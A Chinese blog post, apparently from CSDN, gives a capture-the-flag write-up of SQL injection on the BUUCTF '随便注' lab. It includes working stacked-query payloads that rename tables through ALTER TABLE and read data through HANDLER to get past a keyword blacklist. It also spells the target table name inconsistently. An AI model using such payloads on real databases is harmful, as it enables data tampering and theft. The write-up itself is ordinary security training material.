BUUCTF-web类-第二题 [强网杯 2019]随便注

最新推荐文章于 2023-03-30 11:23:55 发布
最新推荐文章于 2023-03-30 11:23:55 发布
阅读量627 收藏
点赞数 1
文章标签: mysql sql 安全 php 经验分享
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44622228/article/details/105569159
版权

BUUCTF-web类-第二题 [强网杯 2019]随便注
在这里插入图片描述在这里插入图片描述
正常输入1,返回一个数组
在这里插入图片描述
基本操作,单引号测试下,报错了。
在这里插入图片描述看看 1’ or 1=1 #,发现爆出了所有字段。
在这里插入图片描述常规流程,order by,发现到order by 3#时,报错了,说明该表中只有三个字段。
在这里插入图片描述继续常规流程,联合查询,发现提示竟然过滤了这么多注入时常用的关键字,看来事情没有这么简单。
在这里插入图片描述于是我选择了从头再来,看看有没有别的注入方式,结果发现竟然存在堆叠注入。
于是我们查查库,查查表,查查字段。
库:

1';show databases;#

在这里插入图片描述表:发现有两个表 ‘191919810931114514’和’words’

1';show tables;#

在这里插入图片描述'191919810931114514’表中字段,发现flag应该就是在这个表中了

1';show columns from `1919810931114514`# 
注意一下这里时反引号``

在这里插入图片描述'words’表中字段

1';show columns from `words`# 注意反引号

在这里插入图片描述对比我们刚刚输入1查询之后的结果,可以发现原来查询之后返回的都是words表中的结果,所以出现了骚思路,能否将 '191919810931114514’表中的flag字段作为结果放回出来,于是进行测试,发现没有过滤过滤alert和rename关键字。
思路是这样:
这时候我们就可以已下面的骚姿势进行注入:
(1)将words表改名为word1
(2)1919810931114514改名为words
(3)将flag列改名为id(记得数值类型也要改)
构造payload:

1'; alter table words rename to words1;alter table `1919810931114514` rename to words;alter table words change flag id varchar(50);#

更改完,1’ or 1=1 #看看结果,得到了flag。
在这里插入图片描述后来发现,还有一种很简单的解法,因为用的是黑名单过滤,其实还有一个关键字没有被过滤掉,那就是handler
在这里插入图片描述payload:

1';
handler `1919810931114514` open;
handler `1919810931114514` read first;#

反引号千万别忘了,这道题被反引号坑了几次了!!!
如果表名是纯数字需要用反引号包裹,不然不会出现回显。
MySQL中反引号和单引号的区别与用法
(1)MySql 中用一对反引号来标注 SQL 语句中的标识,如数据库名、表名、字段名等
(2)引号则用来标注语句中所引用的字符型常量或日期/时间型常量,即字段值
本题的mysql查询语句应该是

select * from words where id=`$injec`;

本题难点在于姿势以及想法,着实扩展了眼界。

目标是成为神奇宝贝大师
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
BUUCTFweb强网杯2019随便
12-14
开始入: 1’ : 报错 ...# 这里意表名为数字的要加反引号 “ :在网上百度发现 得到 一个带有flag的字段 和 另一个 可查询的表 flag表:可查询表: 到这里虽然发现flag 但是select已经被ban了所
BUUCTF-Web-Mark loves cat变量函数覆盖
02-16
漏洞通常出现在以下几种情况: 1. **全局变量覆盖**: 在PHP 5.3.0之前,如果`register_globals`配置选项设为`ON`,那么HTTP请求中的变量(如GET、POST、COOKIE等)会被自动转换为全局变量。攻击者可以通过...
BUUCTF--[CISCN2019 华东北赛区]Web2
qq_46263951的博客
07-25 417
进入之后我们看到的是一个blog页面, 随便册一个账号进入 通过扫描目录发现admin.php,访问后给出以下提示 所以这里我们需要一个admin的cookie 再来看各个页面的作用 投稿:我们输入一段内容,然后会给出显示我们文章内容的链接,这里存在着存储型xss漏洞 反馈:通过提示我们可以知道我们提交反馈的链接admin用户会去访问,所以我们可以通过这里来获取的admin的cookie 大致流程:投稿处提交我们的xss代码--获取代码所在的链接--反馈给admin--获取cookie .
BUUCTF记录】[强网杯 2019]随便
m0_60911102的博客
09-17 363
随便
buuctf [强网杯 2019]随便 1
weixin_45642610的博客
01-07 1万+
buuctf web [强网杯 2019]随便 1 -刷个人日记 小白一个,写给自己看。 打开后是这样。 从目和内容来看就是一道sql。 输入 1' or 1=1;# 这个#用来释掉后面的sql语句 显示所有数据,这个数据有什么用我也不知道,但sql入一般第一步就是这样看看有没有有用的信息(没有)。 输入 1' order by 2;# 1' order by 3;# 到第3列报错,说明只显示两列。 输入1'; show tables;# 可以看到有 191981093
BUUCTF-练习场-WEB-第二部分(8道)
weixin_45908624的博客
03-30 332
BUUCTF-Web-8道
BUUCTF[强网杯 2019]随便 的三种解法
热门推荐
qq_44657899的博客
11-27 2万+
00X01 [强网杯 2019]随便 1’ or 1=1 #
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
BUUCTF-MISC-WP(详细解思路)
最新发布
01-27
BUUCTF-MISC-WP(详细解思路)
1ncrd#Study-Record#BUUCTF[第二web进阶]XSS闯关1.md
08-10
一些关于xss的payload
[CTF]强网杯2019随便
凉水的博客
10-16 304
简介 对安全有兴趣,BUUCTF上一道一道做,记一些有意思的东西。 关键点 1 发现入点 这很容易实验,最简单的1’ or 1之的语句可以测出来,闭环单引号就可以。 #释符号,如果没起作用,需要意使用url编码。 2 PHP的防入 发现可以随便之后,试了union select之的,也面提示: return preg_match("/select|update|delete|drop|insert|where|\./i",$inject); 搜了一圈,没发现可以绕过的方法。 然后尝试多语句
BUUCTF [强网杯 2019]随便
m0_63253040的博客
03-28 784
和[SUCTF 2019]EasySQL似,都可以使用堆叠入 参考wp 用1' or 1=1#可以爆出所有表内容 先尝试联合查询入 过滤了select,where等等,使用堆叠入 再看表 看下1919810931114514表 发现flag在里面,但是没办法查询,先看看word表 可以看见有字段id和data,这里应猜测查询语句 selsect id,data from words where id = 根据查询语句来改掉字段的名字 ...
WEB_HCTF_2018_WarmUp
Pz_mstr's Blog
03-06 640
Categories web-代码审计 write up source code get source code http://eb22847d-9f8a-4ecf-b972-5ecebfcf5faf.node3.buuoj.cn/source.php <?php highlight_file(__FILE__); class emmm { publi...
BUUCTF-Web解(二)
flying_bird2019的博客
03-30 269
Hack World 本可以使用异或入 0^(if(ascii(substr((select(flag)from(flag)),?,1))>?,1,0)) 这道主要学到了过滤空格如何入 空格过滤可以用(字段)、反引号+字段+反引号 本反引号也被过滤因此只能用括号 ...
BUUCTF web部分(二)
yqdid的博客
04-01 1730
[极客大挑战 2019]EasySQL 这是一道sq ,有用户登录界面,根据之前做sqli_labs的经验,先尝试admin账户。 嗯…不出意料 然后我在用户名输入框内尝试sq入:admin’ or 1=1# 页面无回显,但是没有报错 接着 我试了试order by 语句 发现有报错: 仔细一看 ,发现 报错语句中有“and password=‘admin’ at line 1”; (直觉 )然后我在密码一栏进行入 :admin' or 1=1 # 由于是恒真语句,所以成功绕过,直接拿到了
记录之 webbuuctf 2
dwrnxjlove的博客
07-12 533
记录之 webbuuctf 2 目录刷记录之 webbuuctf 2IncludeSecret File Include 看到目之后看到是Include想到可能是文件包含或者是伪协议利用的目,打开目之后是个很简洁的页面,只有一个链接 打开这个链接之后是一句话:Can you find out the flag? 问你是否能够找到flag,没有其他有用的信息,然后我就查看网页源代码: 发现这里面有个一变量file和flag.php但是访问flag.php返回的就是Can you find ou
BUUCTF-强网杯-随便
wuerror的博客
06-30 6491
引用:https://www.cnblogs.com/Mikasa-Ackerman/p/11050033.html 1‘ //首先尝试的加引号,报错了 1’ # //正常 1‘ order by 1 # //用order by 测试得到列数为2 1' union select 1,2 # //回显了过滤规则 return preg_match("/select|update|delete|d...
BUUCTF [强网杯 2019] 随便
Senimo
03-23 1625
BUUCTF [强网杯 2019] 随便 打开环境: 先输入1查询回显内容: 输入1'测试SQL语句闭合型: 判断出原SQL闭合方式为:inject='1',查询字段数: 1' union select 11,22 # 产生回显: 屏蔽掉了部分关键字,尝试各种入姿势,直到使用堆叠入: 1';show databases;# 得到了各数据库的名字,再查看表名: 1';show ...
BUUCTF web-[强网杯 2019]随便
m0_53314778的博客
01-15 803
按流程走,首先初步判定是否存在sql入(肯定存在了,我们假装判定一下) 输入 1’ or 1=1 #,得到 我们再依次尝试输入 1’ order by 1# 1’ order by 2# 1’ order by 3# 测字段数 到3 报错,字段数为2 尝试联合入union,看能否查出字段 select被过滤,不能查。我们接着爆表 显示有两个表,为word 和 1919810931114514,表位数字串要记得加单引号`` 我们试着爆出两个表的内容 1’; show columns from wo
buuctf-强网杯2019随便
09-03
buuctf-强网杯2019随便是一场2019强网杯举办的CTF比赛中的一道目。这道目的名称暗示着它是一个与入漏洞相关的目。 入漏洞是一种网络安全漏洞,攻击者可以通过在用户输入的数据中入恶意代码来获取或者修改数据库中的数据。通常,这种漏洞主要存在于动态网页应用程序中,比如通过用户输入生成SQL查询语句的网页。攻击者可以通过在用户输入的数据中插入SQL代码,从而绕过正常的验证机制,查看、修改或者删除数据库中的数据。 为了解决入漏洞,我们需要在编写动态网页应用程序时,对用户输入的数据进行严格的验证和过滤,避免将恶意代码传递给数据库。 对于buuctf-强网杯2019随便这道目,我们需要了解目的具体要求和给定的环境,然后通过分析和尝试来找到漏洞的利用方法。可能的解思路包括对输入的数据进行SQL入、获取数据库中的信息或者修改数据库中的数据等等。 解决这道目需要具备一定的网络安全知识和相关工具的使用能力。通过不断的尝试和调试,找到并利用漏洞成功获取到flag(标志),即为完成目。 总之,buuctf-强网杯2019随便是一道涉及入漏洞的CTF目,要求我们通过找到并利用漏洞来获取flag。完成这道目需要一定的网络安全知识和技术。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值